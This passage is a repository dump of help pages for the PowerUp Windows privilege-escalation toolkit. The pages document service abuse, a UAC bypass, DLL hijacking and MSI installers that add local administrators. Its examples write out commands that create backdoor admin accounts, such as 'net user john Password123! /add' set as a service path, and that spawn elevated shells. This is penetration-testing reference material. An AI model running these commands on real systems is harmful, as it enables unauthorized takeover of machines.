False\r\n```\r\n\r\n### -LocalGroup\r\nLocal group name to add the user to (default of 'Administrators').\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: Administrators\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object specifying the user/password to add.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Command\r\nCustom command to execute instead of user creation.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerUp.ServiceBinary.Installed\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Privesc/Invoke-PrivescAudit.md",
    "content": "# Invoke-PrivescAudit\r\n\r\n## SYNOPSIS\r\nExecutes all functions that check for various Windows privilege escalation opportunities.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: None\r\n\r\n## SYNTAX\r\n\r\n```\r\nInvoke-PrivescAudit [-HTMLReport]\r\n```\r\n\r\n## DESCRIPTION\r\nExecutes all functions that check for various Windows privilege escalation opportunities.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nInvoke-PrivescAudit\r\n```\r\n\r\nRuns all escalation checks and outputs a status report for discovered issues.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nInvoke-PrivescAudit -HTMLReport\r\n```\r\n\r\nRuns all escalation checks and outputs a status report to SYSTEM.username.html\r\ndetailing any discovered issues.\r\n\r\n## PARAMETERS\r\n\r\n### -HTMLReport\r\nSwitch.\r\nWrite a HTML version of the report to SYSTEM.username.html.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### System.String\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Privesc/Invoke-ServiceAbuse.md",
    "content": "# Invoke-ServiceAbuse\r\n\r\n## SYNOPSIS\r\nAbuses a function the current user has configuration rights on in order\r\nto add a local administrator or execute a custom command.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Get-ServiceDetail, Set-ServiceBinaryPath\r\n\r\n## SYNTAX\r\n\r\n```\r\nInvoke-ServiceAbuse [-Name] <String[]> [-UserName <String>] [-Password <String>] [-LocalGroup <String>]\r\n [-Credential <PSCredential>] [-Command <String>] [-Force]\r\n```\r\n\r\n## DESCRIPTION\r\nTakes a service Name or a ServiceProcess.ServiceController on the pipeline that the current\r\nuser has configuration modification rights on and executes a series of automated actions to\r\nexecute commands as SYSTEM.\r\nFirst, the service is enabled if it was set as disabled and the\r\noriginal service binary path and configuration state are preserved.\r\nThen the service is stopped\r\nand the Set-ServiceBinaryPath function is used to set the binary (binPath) for the service to a\r\nseries of commands, the service is started, stopped, and the next command is configured.\r\nAfter\r\ncompletion, the original service configuration is restored and a custom object is returned\r\nthat captures the service abused and commands run.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nInvoke-ServiceAbuse -Name VulnSVC\r\n```\r\n\r\nAbuses service 'VulnSVC' to add a localuser \"john\" with password\r\n\"Password123!\r\nto the  machine and local administrator group\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nGet-Service VulnSVC | Invoke-ServiceAbuse\r\n```\r\n\r\nAbuses service 'VulnSVC' to add a localuser \"john\" with password\r\n\"Password123!\r\nto the  machine and local administrator group\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\nInvoke-ServiceAbuse -Name VulnSVC -UserName \"TESTLAB\\john\"\r\n```\r\n\r\nAbuses service 'VulnSVC' to add a the domain user TESTLAB\\john to the\r\nlocal adminisrtators group.\r\n\r\n### -------------------------- EXAMPLE 4 --------------------------\r\n```\r\nInvoke-ServiceAbuse -Name VulnSVC -UserName backdoor -Password password -LocalGroup \"Power Users\"\r\n```\r\n\r\nAbuses service 'VulnSVC' to add a localuser \"backdoor\" with password\r\n\"password\" to the  machine and local \"Power Users\" group\r\n\r\n### -------------------------- EXAMPLE 5 --------------------------\r\n```\r\nInvoke-ServiceAbuse -Name VulnSVC -Command \"net ...\"\r\n```\r\n\r\nAbuses service 'VulnSVC' to execute a custom command.\r\n\r\n## PARAMETERS\r\n\r\n### -Name\r\nAn array of one or more service names to abuse.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: ServiceName\r\n\r\nRequired: True\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -UserName\r\nThe \\[domain\\\\\\]username to add.\r\nIf not given, it defaults to \"john\".\r\nDomain users are not created, only added to the specified localgroup.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: John\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Password\r\nThe password to set for the added user.\r\nIf not given, it defaults to \"Password123!\"\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: Password123!\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -LocalGroup\r\nLocal group name to add the user to (default of 'Administrators').\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: Administrators\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object specifying the user/password to add.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Command\r\nCustom command to execute instead of user creation.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Force\r\nSwitch.\r\nForce service stopping, even if other services are dependent.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerUp.AbusedService\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Privesc/Invoke-WScriptUACBypass.md",
    "content": "# Invoke-WScriptUACBypass\r\n\r\n## SYNOPSIS\r\nPerforms the bypass UAC attack by abusing the lack of an embedded manifest in wscript.exe.\r\n\r\nAuthor: Matt Nelson (@enigma0x3), Will Schroeder (@harmj0y), Vozzie  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: None\r\n\r\n## SYNTAX\r\n\r\n```\r\nInvoke-WScriptUACBypass [-Command] <String> [-WindowStyle <String>]\r\n```\r\n\r\n## DESCRIPTION\r\nDrops wscript.exe and a custom manifest into C:\\Windows and then proceeds to execute\r\nVBScript using the wscript executable with the new manifest.\r\nThe VBScript executed by\r\nC:\\Windows\\wscript.exe will run elevated.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\n\"\r\n```\r\n\r\nLaunches the specified PowerShell encoded command in high-integrity.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nInvoke-WScriptUACBypass -Command cmd.exe -WindowStyle 'Visible'\r\n```\r\n\r\nSpawns a high integrity cmd.exe.\r\n\r\n## PARAMETERS\r\n\r\n### -Command\r\nThe shell command you want wscript.exe to run elevated.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: CMD\r\n\r\nRequired: True\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -WindowStyle\r\nWhether to display or hide the window for the executed '-Command X'.\r\nAccepted values are 'Hidden' and 'Normal'/'Visible.\r\nDefault is 'Hidden'.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: Hidden\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n[http://seclist.us/uac-bypass-vulnerability-in-the-windows-script-host.html\r\nhttps://github.com/Vozzie/uacscript\r\nhttps://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-WScriptBypassUAC.ps1](http://seclist.us/uac-bypass-vulnerability-in-the-windows-script-host.html\r\nhttps://github.com/Vozzie/uacscript\r\nhttps://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-WScriptBypassUAC.ps1)\r\n\r\n"
  },
  {
    "path": "docs/Privesc/Restore-ServiceBinary.md",
    "content": "# Restore-ServiceBinary\r\n\r\n## SYNOPSIS\r\nRestores a service binary backed up by Install-ServiceBinary.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Get-ServiceDetail, Get-ModifiablePath\r\n\r\n## SYNTAX\r\n\r\n```\r\nRestore-ServiceBinary [-Name] <String> [[-BackupPath] <String>]\r\n```\r\n\r\n## DESCRIPTION\r\nTakes a service Name or a ServiceProcess.ServiceController on the pipeline and\r\nchecks for the existence of an \"OriginalServiceBinary.exe.bak\" in the service\r\nbinary location.\r\nIf it exists, the backup binary is restored to the original\r\nbinary path.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nRestore-ServiceBinary -Name VulnSVC\r\n```\r\n\r\nRestore the original binary for the service 'VulnSVC'.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nGet-Service VulnSVC | Restore-ServiceBinary\r\n```\r\n\r\nRestore the original binary for the service 'VulnSVC'.\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\nRestore-ServiceBinary -Name VulnSVC -BackupPath 'C:\\temp\\backup.exe'\r\n```\r\n\r\nRestore the original binary for the service 'VulnSVC' from a custom location.\r\n\r\n## PARAMETERS\r\n\r\n### -Name\r\nThe service name to restore a binary for.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: ServiceName\r\n\r\nRequired: True\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -BackupPath\r\nOptional manual path to the backup binary.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 2\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerUp.ServiceBinary.Installed\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Privesc/Set-ServiceBinaryPath.md",
    "content": "# Set-ServiceBinaryPath\r\n\r\n## SYNOPSIS\r\nSets the binary path for a service to a specified value.\r\n\r\nAuthor: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: PSReflect\r\n\r\n## SYNTAX\r\n\r\n```\r\nSet-ServiceBinaryPath [-Name] <String[]> [-Path] <String>\r\n```\r\n\r\n## DESCRIPTION\r\nTakes a service Name or a ServiceProcess.ServiceController on the pipeline and first opens up a\r\nservice handle to the service with ConfigControl access using the GetServiceHandle\r\nWin32 API call.\r\nChangeServiceConfig is then used to set the binary path (lpBinaryPathName/binPath)\r\nto the string value specified by binPath, and the handle is closed off.\r\n\r\nTakes one or more ServiceProcess.ServiceController objects on the pipeline and adds a\r\nDacl field to each object.\r\nIt does this by opening a handle with ReadControl for the\r\nservice with using the GetServiceHandle Win32 API call and then uses\r\nQueryServiceObjectSecurity to retrieve a copy of the security descriptor for the service.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nSet-ServiceBinaryPath -Name VulnSvc -Path 'net user john Password123! /add'\r\n```\r\n\r\nSets the binary path for 'VulnSvc' to be a command to add a user.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nGet-Service VulnSvc | Set-ServiceBinaryPath -Path 'net user john Password123! /add'\r\n```\r\n\r\nSets the binary path for 'VulnSvc' to be a command to add a user.\r\n\r\n## PARAMETERS\r\n\r\n### -Name\r\nAn array of one or more service names to set the binary path for.\r\nRequired.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: ServiceName\r\n\r\nRequired: True\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Path\r\nThe new binary path (lpBinaryPathName) to set for the specified service.\r\nRequired.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: BinaryPath, binPath\r\n\r\nRequired: True\r\nPosition: 2\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### System.Boolean\r\n\r\n$True if configuration succeeds, $False otherwise.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n[https://msdn.microsoft.com/en-us/library/windows/desktop/ms681987(v=vs.85).aspx](https://msdn.microsoft.com/en-us/library/windows/desktop/ms681987(v=vs.85).aspx)\r\n\r\n"
  },
  {
    "path": "docs/Privesc/Test-ServiceDaclPermission.md",
    "content": "# Test-ServiceDaclPermission\r\n\r\n## SYNOPSIS\r\nTests one or more passed services or service names against a given permission set,\r\nreturning the service objects where the current user have the specified permissions.\r\n\r\nAuthor: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Add-ServiceDacl\r\n\r\n## SYNTAX\r\n\r\n```\r\nTest-ServiceDaclPermission [-Name] <String[]> [-Permissions <String[]>] [-PermissionSet <String>]\r\n```\r\n\r\n## DESCRIPTION\r\nTakes a service Name or a ServiceProcess.ServiceController on the pipeline, and first adds\r\na service Dacl to the service object with Add-ServiceDacl.\r\nAll group SIDs for the current\r\nuser are enumerated services where the user has some type of permission are filtered.\r\nThe\r\nservices are then filtered against a specified set of permissions, and services where the\r\ncurrent user have the specified permissions are returned.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-Service | Test-ServiceDaclPermission\r\n```\r\n\r\nReturn all service objects where the current user can modify the service configuration.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nGet-Service | Test-ServiceDaclPermission -PermissionSet 'Restart'\r\n```\r\n\r\nReturn all service objects that the current user can restart.\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\nTest-ServiceDaclPermission -Permissions 'Start' -Name 'VulnSVC'\r\n```\r\n\r\nReturn the VulnSVC object if the current user has start permissions.\r\n\r\n## PARAMETERS\r\n\r\n### -Name\r\nAn array of one or more service names to test against the specified permission set.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: ServiceName, Service\r\n\r\nRequired: True\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Permissions\r\nA manual set of permission to test again.\r\nOne of:'QueryConfig', 'ChangeConfig', 'QueryStatus',\r\n'EnumerateDependents', 'Start', 'Stop', 'PauseContinue', 'Interrogate', UserDefinedControl',\r\n'Delete', 'ReadControl', 'WriteDac', 'WriteOwner', 'Synchronize', 'AccessSystemSecurity',\r\n'GenericAll', 'GenericExecute', 'GenericWrite', 'GenericRead', 'AllAccess'\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -PermissionSet\r\nA pre-defined permission set to test a specified service against.\r\n'ChangeConfig', 'Restart', or 'AllAccess'.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: ChangeConfig\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### ServiceProcess.ServiceController\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n[https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/](https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/)\r\n\r\n"
  },
  {
    "path": "docs/Privesc/Write-HijackDll.md",
    "content": "# Write-HijackDll\r\n\r\n## SYNOPSIS\r\nPatches in the path to a specified .bat (containing the specified command) into a\r\npre-compiled hijackable C++ DLL writes the DLL out to the specified ServicePath location.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: None\r\n\r\n## SYNTAX\r\n\r\n```\r\nWrite-HijackDll [-DllPath] <String> [[-Architecture] <String>] [[-BatPath] <String>] [[-UserName] <String>]\r\n [[-Password] <String>] [[-LocalGroup] <String>] [[-Credential] <PSCredential>] [[-Command] <String>]\r\n```\r\n\r\n## DESCRIPTION\r\nFirst builds a self-deleting .bat file that executes the specified -Command or local user,\r\nto add and writes the.bat out to -BatPath.\r\nThe BatPath is then patched into a pre-compiled\r\nC++ DLL that is built to be hijackable by the IKEEXT service.\r\nThere are two DLLs, one for\r\nx86 and one for x64, and both are contained as base64-encoded strings.\r\nThe DLL is then\r\nwritten out to the specified OutputFile.\r\n\r\n## EXAMPLES\r\n\r\n### Example 1\r\n```\r\nPS C:\\> {{ Add example code here }}\r\n```\r\n\r\n{{ Add example description here }}\r\n\r\n## PARAMETERS\r\n\r\n### -DllPath\r\nFile name to write the generated DLL out to.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: True\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Architecture\r\nThe Architecture to generate for the DLL, x86 or x64.\r\nIf not specified, PowerUp\r\nwill try to automatically determine the correct architecture.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 2\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -BatPath\r\nPath to the .bat for the DLL to launch.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 3\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -UserName\r\nThe \\[domain\\\\\\]username to add.\r\nIf not given, it defaults to \"john\".\r\nDomain users are not created, only added to the specified localgroup.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 4\r\nDefault value: John\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Password\r\nThe password to set for the added user.\r\nIf not given, it defaults to \"Password123!\"\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 5\r\nDefault value: Password123!\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -LocalGroup\r\nLocal group name to add the user to (default of 'Administrators').\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 6\r\nDefault value: Administrators\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object specifying the user/password to add.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 7\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Command\r\nCustom command to execute instead of user creation.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 8\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerUp.HijackableDLL\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Privesc/Write-ServiceBinary.md",
    "content": "# Write-ServiceBinary\r\n\r\n## SYNOPSIS\r\nPatches in the specified command to a pre-compiled C# service executable and\r\nwrites the binary out to the specified ServicePath location.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: None\r\n\r\n## SYNTAX\r\n\r\n```\r\nWrite-ServiceBinary [-Name] <String> [-UserName <String>] [-Password <String>] [-LocalGroup <String>]\r\n [-Credential <PSCredential>] [-Command <String>] [-Path <String>]\r\n```\r\n\r\n## DESCRIPTION\r\nTakes a pre-compiled C# service binary and patches in the appropriate commands needed\r\nfor service abuse.\r\nIf a -UserName/-Password or -Credential is specified, the command\r\npatched in creates a local user and adds them to the specified -LocalGroup, otherwise\r\nthe specified -Command is patched in.\r\nThe binary is then written out to the specified\r\n-ServicePath.\r\nEither -Name must be specified for the service, or a proper object from\r\nGet-Service must be passed on the pipeline in order to patch in the appropriate service\r\nname the binary will be running under.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nWrite-ServiceBinary -Name VulnSVC\r\n```\r\n\r\nWrites a service binary to service.exe in the local directory for VulnSVC that\r\nadds a local Administrator (john/Password123!).\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nGet-Service VulnSVC | Write-ServiceBinary\r\n```\r\n\r\nWrites a service binary to service.exe in the local directory for VulnSVC that\r\nadds a local Administrator (john/Password123!).\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\nWrite-ServiceBinary -Name VulnSVC -UserName 'TESTLAB\\john'\r\n```\r\n\r\nWrites a service binary to service.exe in the local directory for VulnSVC that adds\r\nTESTLAB\\john to the Administrators local group.\r\n\r\n### -------------------------- EXAMPLE 4 --------------------------\r\n```\r\nWrite-ServiceBinary -Name VulnSVC -UserName backdoor -Password Password123!\r\n```\r\n\r\nWrites a service binary to service.exe in the local directory for VulnSVC that\r\nadds a local Administrator (backdoor/Password123!).\r\n\r\n### -------------------------- EXAMPLE 5 --------------------------\r\n```\r\nWrite-ServiceBinary -Name VulnSVC -Command \"net ...\"\r\n```\r\n\r\nWrites a service binary to service.exe in the local directory for VulnSVC that\r\nexecutes a custom command.\r\n\r\n## PARAMETERS\r\n\r\n### -Name\r\nThe service name the EXE will be running under.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: ServiceName\r\n\r\nRequired: True\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -UserName\r\nThe \\[domain\\\\\\]username to add.\r\nIf not given, it defaults to \"john\".\r\nDomain users are not created, only added to the specified localgroup.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: John\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Password\r\nThe password to set for the added user.\r\nIf not given, it defaults to \"Password123!\"\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: Password123!\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -LocalGroup\r\nLocal group name to add the user to (default of 'Administrators').\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: Administrators\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object specifying the user/password to add.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Command\r\nCustom command to execute instead of user creation.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Path\r\nPath to write the binary out to, defaults to 'service.exe' in the local directory.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: \"$(Convert-Path .)\\service.exe\"\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerUp.ServiceBinary\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Privesc/Write-UserAddMSI.md",
    "content": "# Write-UserAddMSI\r\n\r\n## SYNOPSIS\r\nWrites out a precompiled MSI installer that prompts for a user/group addition.\r\nThis function can be used to abuse Get-RegistryAlwaysInstallElevated.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: None\r\n\r\n## SYNTAX\r\n\r\n```\r\nWrite-UserAddMSI [[-Path] <String>]\r\n```\r\n\r\n## DESCRIPTION\r\nWrites out a precompiled MSI installer that prompts for a user/group addition.\r\nThis function can be used to abuse Get-RegistryAlwaysInstallElevated.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nWrite-UserAddMSI\r\n```\r\n\r\nWrites the user add MSI to the local directory.\r\n\r\n## PARAMETERS\r\n\r\n### -Path\r\n{{Fill Path Description}}\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: ServiceName\r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: UserAdd.msi\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerUp.UserAddMSI\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Privesc/index.md",
    "content": "## PowerUp\n\nPowerUp aims to be a clearinghouse of common Windows privilege escalation\nvectors that rely on misconfigurations.\n\nRunning Invoke-AllChecks will output any identifiable vulnerabilities along\nwith specifications for any abuse functions. The -HTMLReport flag will also\ngenerate a COMPUTER.username.html version of the report.\n\nAuthor: @harmj0y\nLicense: BSD 3-Clause\nRequired Dependencies: None\nOptional Dependencies: None\n\n\n### Token/Privilege Enumeration/Abuse:\n    Get-ProcessTokenGroup               -   returns all SIDs that the current token context is a part of, whether they are disabled or not\n    Get-ProcessTokenPrivilege           -   returns all privileges for the current (or specified) process ID\n    Enable-Privilege                    -   enables a specific privilege for the current process\n\n### Service Enumeration/Abuse:\n    Test-ServiceDaclPermission          -   tests one or more passed services or service names against a given permission set\n    Get-UnquotedService                 -   returns services with unquoted paths that also have a space in the name\n    Get-ModifiableServiceFile           -   returns services where the current user can write to the service binary path or its config\n    Get-ModifiableService               -   returns services the current user can modify\n    Get-ServiceDetail                   -   returns detailed information about a specified service\n    Set-ServiceBinaryPath               -   sets the binary path for a service to a specified value\n    Invoke-ServiceAbuse                 -   modifies a vulnerable service to create a local admin or execute a custom command\n    Write-ServiceBinary                 -   writes out a patched C# service binary that adds a local admin or executes a custom command\n    Install-ServiceBinary               -   replaces a service binary with one that adds a local admin or executes a custom command\n    Restore-ServiceBinary               -   restores a replaced service binary with the original executable\n\n### DLL Hijacking:\n    Find-ProcessDLLHijack               -   finds potential DLL hijacking opportunities for currently running processes\n    Find-PathDLLHijack                  -   finds service %PATH% DLL hijacking opportunities\n    Write-HijackDll                     -   writes out a hijackable 